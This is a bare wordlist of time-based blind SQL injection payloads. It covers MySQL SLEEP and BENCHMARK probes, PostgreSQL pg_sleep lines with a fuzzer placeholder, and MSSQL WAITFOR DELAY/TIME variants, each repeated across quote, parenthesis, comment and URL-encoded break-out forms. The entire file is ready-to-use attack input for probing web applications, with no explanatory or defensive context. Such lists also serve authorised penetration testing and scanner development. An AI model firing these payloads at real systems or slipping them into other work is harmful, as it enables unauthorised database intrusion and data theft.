' RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
' RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
" RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
" RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
" RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
" RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
') RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
') RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
') RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
') RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
") RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
") RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
") RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
") RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
')) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
')) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
')) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
')) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)--+-
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337)#
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND '
"))) RLIKE (SELECT * FROM (SELECT(SLEEP(10)))Y4T0G4M11337) AND "
' AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
' AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
' AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
' AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
" AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
" AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
" AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
" AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
') AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
') AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
') AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
') AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
") AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
") AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
") AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
") AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
')) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
')) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
')) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
')) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
"))) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))--+-
"))) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337'))#
"))) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND '
"))) AND 1337 LIKE BENCHMARK(10000,MD5('Y4T0G4M11337')) AND "
pg_sleep(*index*)--
1 or pg_sleep(*index*)--
" or pg_sleep(*index*)--
' or pg_sleep(*index*)--
1) or pg_sleep(*index*)--
") or pg_sleep(*index*)--
') or pg_sleep(*index*)--
1)) or pg_sleep(*index*)--
")) or pg_sleep(*index*)--
')) or pg_sleep(*index*)--
waitfor delay '0:0:10'--
+waitfor+delay+'0:0:10'--
/**/waitfor/**/delay/**/'0:0:10'--
%20waitfor%20delay%20'0:0:20'--
 waitfor delay '0:0:10'/*
+waitfor+delay+'0:0:10'/*
/**/waitfor/**/delay/**/'0:0:10'/*
%20waitfor%20delay%20'0:0:20'/*
'  waitfor delay '0:0:10'--+
'+waitfor+delay+'0:0:10'--+
'/**/ waitfor/**/delay/**/'0:0:10'--+
'%20waitfor%20delay%20'0:0:20'--+
waitfor time '0:0:10'--
+waitfor+time+'0:0:10'--
/**/waitfor/**/time/**/'0:0:10'--
%20waitfor%20time%20'0:0:20'--
 waitfor time '0:0:10'/*
+waitfor+time+'0:0:10'/*
/**/waitfor/**/time/**/'0:0:10'/*
%20waitfor%20time%20'0:0:20'/*
'  waitfor time '0:0:10'--+
'+waitfor+time+'0:0:10'--+
'/**/ waitfor/**/time/**/'0:0:10'--+
'%20waitfor%20time%20'0:0:20'--+